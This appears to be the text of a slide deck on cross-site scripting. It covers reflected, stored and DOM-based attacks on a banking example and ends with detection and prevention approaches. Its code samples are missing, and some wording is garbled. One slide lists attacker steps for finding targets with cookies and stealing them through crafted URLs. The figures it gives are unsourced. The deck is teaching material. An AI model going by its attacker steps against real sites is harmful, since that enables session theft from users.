What is a XSS Attack? XSS Attack is a potentially dangerous security vulnerability found in web- based applications It allows a variety of code to be injected by a malicious user into a webpage XSS is very easy to execute and very long and arduous to repair Takes about 52 days to fix an XSS holes 10-25 XSS holes are found in commercial products every month During an attack “everything looks fine” to the end user, but in actuality they are subject to an endless amount of threats
Types of XSS Attacks Non-Persistent (Reflected) Most common type With invalidated user-supplied data in a resulting webpage without html encoding, client-side code can be injected into the dynamic page An attacker convinces a user to follow a malicious URL which injects code into the resulting page Now the attacker has full access to that pages content
Attack Scenario of Non-Persistent The user comes in contact with a malicious link, form, or a malicious redirection. The Web application is requested prepared the call by the Bank. The XSS-code is an XSS vulnerability of the banking application, inserted into the page. The infected page with XSS code is sent to the user. The XSS-code context of the page arrived at the user and thus bypassing the "Same Origin" security setting of the Web browser. XSS-code sends stolen data to the server of the attacker.
Methodology Lets look into how this works with a simple example of a search feature on website. The HTML browser is processing looks like this:
Methodology (contd.) Non-Persistent Reflection Point which demand the use of a 3rd party to exploit it. Imagine an e-mail like this being sent to customers: The email doesnt show the full URL, hiding the malicious code at the very end.
Types of XSS Attacks (contd.) Persistent (Stored ) Allows the most powerful kinds of attacks First data is stored in a server provided by a web application It is later shown to a user on a webpage without any html encoding Ex: Online message board that allows users to post messages for other users to read With this method, malicious scripts can be provided more then once An attack can affect a large amount of users and the application can also be infected by a XSS Virus or Worm
Attack Scenario of Persistent The Web application of the bank is called with the XSS code. The malicious code enters into an XSS vulnerability in the application and is stored there. A user calls the Web application of the Bank. The malicious code is installed from the memory to the website. The infected Web page is sent to the user. The XSS code context of the page arrived at the user, and thus bypassing the "Same Origin" security setting of the Web browser. The XSS code sends stolen data to the server of the attacker.
Methodology Step A) On the product.php?id=1 page users see the product along with customer comments Step B) On product_review.php?id=1a hacker leaves a review with malicious code
Methodology (contd.) Step C) They receive a thank you Step D) You will notice that their attack does not show up immediately, but if you return to products.php?id=1, the new comment is displayed.
Methodology (contd.) The HTML browser would process includes the malicious code hidden in the source :
Types of XSS Attacks (contd.) DOM-Based (Local) Document Object Model Standard object model for representing html or xhtml Problem exists within the page’s client side script If an attacker hosts a malicious site, which contains a vulnerable website on a clients local system, a script can be injected Now the attacker can run the privileges of that users browser on their system.
Attack Scenario of DOM-BASED The Web application is requested by the Bank prepared the call. The XSS-code inserted in the cookie. The cookie with the malicious code is sent to the user and stored with him. The user calls the Web application of the Bank. The malicious code is installed from the cookie in the Web page. The infected Web page is sent to the user. The XSS code sends stolen data to the server of the attacker.
Steps to an XSS Attack Select a target Find an XSS hole, and look if it has any cookies If it has a cookie, then you have found a target Testing Insert code or script pointing to the vulnerability Make sure the page does not appear broken XSS Execution Send your crafted URL to launch it More experienced attackers would do a few redirects to steal cookies, return to site, then attack them harder Decide what to do with the data After collecting data, it is possible to perform an attack
Existing Methods To solve XSS problemsA. Dynamic Approach1) Vulnerability Analysis based Approach: It track untrusted data at the character level.2) Attack Prevention Approach: A web proxy protects against transferring informations.B. Static Analysis1) String Analysis.2) Preventing XSS Using Untrusted Scripts.3) Software Testing Techniques (black-box testing)
Existing Methods To solve XSS problemsC. Static and Dynamic Analysis Combination Lattice-based Analysis (white-box testing) The Web SSARI is a tool, combination of static and runtime features that apply static taint propagation analysis to find security vulnerabilities.
Conclusion XSS is defined as the number one and utmost prevalent website vulnerability on the internet No one is ever completely safe from XSS Can not be expected to write flawless code or have round the clock personnel to answer all possible vulnerability issues As XSS vulnerabilities continue to grow, the best way to protect yourself from it is to be careful and be aware of its existence